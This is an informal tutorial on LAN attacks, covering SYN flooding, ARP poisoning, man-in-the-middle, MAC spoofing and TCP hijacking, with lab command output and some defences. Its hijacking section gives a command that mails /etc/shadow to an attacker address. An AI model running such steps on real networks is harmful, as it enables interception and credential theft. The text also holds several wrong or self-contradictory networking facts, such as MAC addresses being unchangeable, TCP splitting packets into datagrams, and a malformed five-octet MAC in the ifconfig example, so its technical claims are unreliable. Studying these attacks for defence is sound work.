Communication on LAN basically takes place through protocols like tcp/ip, udp/ip, arp, icmp etc and the most popular of these protocol is tcp/ip.
TCP(Transmission Control Protocol)
Data send on the network is in form of packets which contain information about source, target and data to be sent. TCP is a protocol developed to make sure that packets are not lost on the network as routers sent them from computer to computer. TCP splits a packet into little pieces, each piece is called a datagram.
A typical datagram looks like this :-
ETHERNET HEADER |
IP HEADER |
TCP HEADER |
DATA |
-->Destination MAC, Source MAC
-->Dest IP, port and Source IP, port
-->SYN,ACK,PSH,RST
The address of network card is called the MAC address. MAC address is a globally unique and unchangeable address which is stored on the network card itself.
TCP HEADER FLAGS (that we care about)
- SYN-->used in initial connection setup
- ACK-->used to acknowledge received data, makes tcp reliable.
- PSH--> set when there is data in the packet to pushed up to the application.
- RST--> signals something horribly wrong (like a closed port), other side must stop sending data.
HOW TCP CONNECTION IS ESTABLISHED
Sending a packet with SYN flag means it’s sender wants to establish a three way TCP/IP connection with the destination system. Let’s understand this in a better way -->
If you are A and the other one is B. You want a connection with B.
A----------------------SYN------------------------>B
B-------------------SYN/ACK-------------------->A
A---------------------ACK------------------------->B
Now the TCP connection is established.
SYN FLOODING
SYN Flooding is an attack in which large no. of SYN packets are sent to the target (victim) by an attacker with a fake IP address such that all the memory of the target gets hogged up in trying to establish a connection with the fake IP address which does not exist in the network.
Effects
As a result of SYN flooding all the services running on the attacked ports of the target computer are affected .The computer gets busy in sending SYN/ACK packets and is unable to provide service to legitimate users or clients. If an enormously large amount of SYN packets are sent, the target may get hanged or rebooted.
How the attack is done:
Windows is vulnerable to SYN-flood attack
Here is the state of 169.254.0.18 when we flooded it from my computer (169.254.0.20) by fake IP address(169.254.1.21) to the ports 25 and 139.The fake address must have your network ID (as here is it 169.254) and it should be non-existing. You can check its existence by pinging it).
C:\netstat
Active Connections
Proto Local Address Foreign Address State
TCP 169.254.0.18:25 169.254.0.21:21 SYN_RECEIVED
TCP 169.254.0.18:139 169.254.0.21:139 SYN_RECEIVED
How to detect SYN Attack
When the Attacker system sends SYN packet to the client, the client replies by sending SYN/ACK packet and it is waiting to receive an ACK, then the existing connection is said to be in the Half-open connection or client is said to be in the state of SYN_RECIEVED. It is the state, that one can use to detect whether his system is under SYN-floods or not.
Arp –a: another way to detect SYN attack
In previous attack, the ARP cache of 169.254.0.18 is -->
Interface: 169.254.0.18 on Interface 0x1000003
Internet Address Physical Address Type
169.254.0.21 00-00-00-00-00-00 invalid
169.254.74.30 00-0c-6e-f1-9e-a3 dynamic
As shown in the highlighted case, if the connection type is invalid and the MAC address is as shown above, it can be deduced that you are under SYN-floods.
SPOOFING
Spoofing is a technique to disguise yourself as somebody else which may or may not exist in the network depending upon your choice. It forms the basics of attacking on the network. There are many types of spoofing like ->>
- IP Spoofing
- ARP Spoofing
- DNS Spoofing
In this paper we will be discussing only ARP spoofing.
ARP SPOOFING
Any computer connected to the switched network (LAN) has two addresses.
MAC Address is the network card address and it is fixed. It is essential so that the Ethernet protocol (can be TCP/IP,UDP,FTP etc) can send data back and froth, independent of whatever application protocols are used on top of it. Ethernet builds frames of data and each frame has an Ethernet header, containing the MAC address of the source and the destination computer.
IP address is a virtual address of the computer on the network.
HOW LAN WORKS
When an Ethernet frame is constructed, it must be built from an IP packet. At the time of construction, Ethernet has no idea what is the MAC Address of the destination machine which it needs to create an Ethernet header. The only information it has available is the destination IP from the packet’s header. There must be a way for the Ethernet protocol to find the MAC Address of the destination machine, given a destination IP.
This is where ARP (Address Resolution Protocol) comes into play.
Let us suppose A (169.254.0.1) wants to connect to C (169.254.0.3) then A will generate an “ARP request” packet and broadcast it to all the users on the network inquiring “Is your IP address 169.254.0.3, if so then send your MAC address to me”.
Since the ARP request is sent in a broadcast frame, every Ethernet interface on the network reads it in and hands the ARP request to the networking software running on the
system. Only C with IP address 169.254.0.3 will respond, by sending a packet containing the MAC address of C back to the requesting system. Now A has a MAC address to which it can send data destined for C, and the high-level protocol communication can proceed.
To minimize the number of ARP requests being broadcast, operating systems keep a cache of ARP replies. When a computer receives an ARP reply, it will update its ARP cache with the new IP/MAC association.
IF you want to know the MAC Address of the remote host, just type
C:/>nbtstat -A 169.254.24.60 OR nbtstat –a chetan
Local Area Connection:
Node IPAddress: [169.254.0.20] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
CHETAN <00> UNIQUE Registered
CHETAN <20> UNIQUE Registered
MSHOME <00> GROUP Registered
MSHOME <1E> GROUP Registered
CHETAN <01> UNIQUE Registered
CHETAN <03> UNIQUE Registered
C_VERMA <03> UNIQUE Registered
MAC Address = 00-0C-6E-94-0A-BF
HOW A SWITCH WORKS
Frame extracts information about destination IP from IP header of the packet. Frame has no idea about the destination MAC Address because there should be a physical link layer between these two systems.
Switch maintains a table which matches switch port numbers to corresponding MAC Addresses. Table is created when switch is powered on by the transferring of first frame through switch port and source MAC Addresses.
This is the situation when no “ARP request/reply” or data transfer has taken place. Suppose H wants to connect to T1(refer Fig 3), an ARP request is broadcast over the LAN to all current users enquiring “Is your IP X1, if so send me back your MAC
Address”. When this is passed through the switch the entry of H’s MAC Address is made in switch’s cache. Now the table will look like
Obviously T1 responds with an “ARP reply” which is unicast to H which contains its own MAC Address. Moreover ARP cache of T1 will now make an entry of H’s IP address and MAC Address. Hence it sends ARP reply directly to H. As this reply will pass through the switch and port 1 down the cable, the cache of the switch will be updated to.
When ARP reply reaches the switch then the switch decides which port to send the frame to, comparing it with the destination address of the frame to an internet table which maps the port numbers to MAC Address. Now the frame will send down the cable through the port 3.
HERE IS THE BUG
As ARP is a stateless protocol, most operating systems will update their cache if a reply is received, regardless of whether they have sent an actual request.
We can exploit this bug.
ARP POISIONING
To view your cache you can type arp –a in the command prompt in Windows(& of course in Linux too).
C:/>arp –a
Interface: 169.254.0.1 on Interface 0x1000003
Internet Address Physical Address Type
169.254.0.3 00-50-ba-8e-ff-e8 dynamic
169.254.32.218 00-0b-2b-0d-fb-69 dynamic
169.254.105.118 00-50-fc-b0-f3-50 dynamic
- 169.254.0.1--> your IP address
- 0x1000003-->the code for your interface(in that case eth0)
- 169.254.0.3-->the IP address of the remote device you are connected
- 00-50-ba-8e-ff-e8-->the MAC address of that machine
- dynamic-->the link type
Let's observe the communication between my machine and 169.254.0.3.I got in my arp table its IP and MAC, it has in its arp table my IP and MAC. These values are updated once at 30 secs. If a malicious user sends me a spoofed packet which maps 169.254.0.3 with a non-existent MAC, I won’t be able to communicate with 169.254.0.3 for at least 30 seconds!!. Enough for an attacker to hijack my session. This is called ARP Poisoning.
Now my ARP cache will look like
C:/>arp –a
Interface: 169.254.0.1 on Interface 0x1000003
Internet Address Physical Address Type
169.254.0.3 00-50-ba-4e-ff-e3 invalid
169.254.32.218 00-0b-2b-0d-fb-69 dynamic
169.254.105.118 00-50-fc-b0-f3-50 dynamic
ATTACKS
MAC SPOOFING
Obtaining MAC Address of another system without sending your real MAC Address or without entering your real MAC Address in another system ARP cache is MAC Spoofing.
AIM -->>>>> H aims to know MAC of A without revealing his real MAC.
H broadcasts an “ARP request” over the network destined to reach A with a fake MAC Address Mf. Now there will be entry of Mf in the cache of switch corresponding to the port of H i.e. 2.Now A will send an “ARP reply” containing his real MAC address to H. When this frame reaches the switch the fake MAC address will be mapped to the port of H i.e. 2 and hence it is delivered to H. Now since the Ethernet card of H is in “promiscuous mode”, where it is allowed to examine frames that are destined for MAC address other than own, there will be entry of A’s real MAC address in H’s ARP cache.
In Linux, promiscuous mode can be enabled-->
# ifconfig eth0 promisc
and to disable it-->
# ifconfig eth0 -promisc
MAN IN MIDDLE ATTACK
Here H will try to insert itself between communication path of T1 and T2. H will forward frames between target computers so that communication is not interrupted.
H poisons ARP cache of T1 and T2 in this way-->
-->H sends a spoofed “ARP reply” to T1 containing T2’s IP with H’s MAC.
-->Also at the same time he sends a spoofed “ARP reply” to T2 containing T1 IP with H’s MAC.
-->Now all T1 and T2 IP traffic will then go to H first instead of directly to each other.
How this attack performs
As T1 & T2 are communicating with each other, T1’s ARP cache contains T2 IP and MAC address and vice versa. H will poison the cache of T1 & T2. It sends a spoofed “ARP reply” to T1 containing T2’s IP and H’s MAC and to T2, sends T1’s IP and H’s MAC. Now in cache of T1, the IP address of T2 will be associated with the MAC address of H. When T1 want to send a packet it first splits into frames. The frame takes the destination IP from IP header of packet to be sent. It will take the MAC address from the cache. This frame having the IP address of T2 and MAC address of H will be sent to the switch by cable. Now the MAC address of frame will be mapped to the switch’s port number in table i.e. cache of switch and as this port no. is 3 so frame will be sent to H. The same thing will happen in case of T2.Now H will forward the data coming from T1 to T2 and T2 to T1,so that connection between T1 & T2 will not interrupted without any trace.
SOLUTION-->>
To avoid this type of attack T1 should have static entry of T2’s IP and MAC and T2 should have static entry of T1’s IP and MAC in their respective caches.
T1 will make a static entry of T2 in this way-->
C:/>arp –s X2 M2
Example
an attack on LAN on success
Comp. | Name | IP Address | OS | MAC |
H | Hacker | 169.254.0.1 | Fedora Core(2.4.221.2115.nptl) | 00:0c:f1:6b:78:4f |
T1 | Target 1 | 169.254.0.2 | Windows 2000(Version 5.00.2195) | 00:02:44:57: 7c:45 |
T2 | Target 2 | 169.254.0.3 | Windows XP(Version 5.1.2600) | 00:50:ba:8f:00:0a |
H sends spoofed “ARP reply” to T1 & T2.The ARP cache of T1 and T2 when they were spoofed:
T1:
Interface: 169.254.0.2 --- 0x2
Internet Address Physical Address Type
169.254.0.3 00-0c-f1-6b-78-4f dynamic
· We can see that in the cache of T1, IP address of T2 corresponds to H’s MAC.
T2:
Interface: 169.254.0.3 on Interface 0x2
Internet Address Physical Address Type
169.254.0.2 00-0c-f1-6b-78-4f dynamic
On hacker’s system, the receiving packets are:
23:42:02.474661 arp reply 169.254.0.3 is-at 0:c:f1:6b:78:4f
23:42:04.084663 arp reply 169.254.0.2 is-at 0:c:f1:6b:78:4f
23:42:04.484652 arp reply 169.254.0.3 is-at 0:c:f1:6b:78:4f
23:42:06.094662 arp reply 169.254.0.2 is-at 0:c:f1:6b:78:4f
23:42:06.494660 arp reply 169.254.0.3 is-at 0:c:f1:6b:78:4f
23:42:08.104664 arp reply 169.254.0.2 is-at 0:c:f1:6b:78:4f
23:42:08.504663 arp reply 169.254.0.3 is-at 0:c:f1:6b:78:4f
23:42:10.114661 arp reply 169.254.0.2 is-at 0:c:f1:6b:78:4f
· When 169.254.0.2 was trying to connect to 169.254.0.3 at the port 25, then the packet was passing through 169.254.0.1 as shown below and hence it proves that 169.254.0.1 is now in between T1 and T2.
23:42:46.294660 arp reply 169.254.0.2 is-at 0:c:f1:6b:78:4f
23:42:46.694653 arp reply 169.254.0.3 is-at 0:c:f1:6b:78:4f
23:42:46.705306 169.254.0.2.1163>169.254.0.3.smtp: S 398263844:398263844(0) win 64240 <mss 1460,nop,nop,sackOK> (DF)
· Also when 169.254.0.3 tried to troubleshoot 169.254.0.2 using ping command, the datagram again passed through 169.254.0.1 as shown below.
23:43:27.254104 169.254.0.3 > 169.254.0.2: icmp: echo request [ttl 1]
23:43:28.504663 arp reply 169.254.0.2 is-at 0:c:f1:6b:78:4f
23:43:28.904661 arp reply 169.254.0.3 is-at 0:c:f1:6b:78:4f
23:43:30.266360 169.254.0.3 > 169.254.0.2: icmp: echo request [ttl 1]
23:43:30.514657 arp reply 169.254.0.2 is-at 0:c:f1:6b:78:4f
23:43:30.914662 arp reply 169.254.0.3 is-at 0:c:f1:6b:78:4f
23:43:32.524663 arp reply 169.254.0.2 is-at 0:c:f1:6b:78:4f
23:43:32.924654 arp reply 169.254.0.3 is-at 0:c:f1:6b:78:4f
23:43:33.270757 169.254.0.3 > 169.254.0.2: icmp: echo request [ttl 1]
23:43:34.534662 arp reply 169.254.0.2 is-at 0:c:f1:6b:78:4f
23:43:34.935399 arp reply 169.254.0.3 is-at 0:c:f1:6b:78:4f
CHANGING MAC ADDRESS
As we mentioned above that MAC address can’t change but Linux users can change their MAC address without spoofing software, using a single parameter “ifconfig”. We can exploit this-->
# ifconfig eth0 hw ether 00:0c:ff:4f:e8
In Windows2000/XP you can do it by using some softwares like SMAC etc.
This can be exploited as follows:--> H DOS attacks on T2 (refer Fig. 3), then assign himself IP and MAC of T2 receiving all frames from T1 intended for T2.
TCP/IP HIJACKING
Let us suppose A has connected to server B as a root administrator using a TELNET or FTP service. A hacker H who is able to sniff around, will do ARP poisoning A and reset his settings to that of A and then will be able to issue commands in place of A like “mail hacker_1@greathackers.com</etc/shadow”, it’s enough. The hacker must DOS A with either SYN flooding or ARP poisoning so that A will not be able to interfere in his attack by storming ARP requests.
SOLUTION -->>
Instead of making a telnet login A can SSH (Secured Shell) or SFTP login to avoid TCP/IP hijacking.
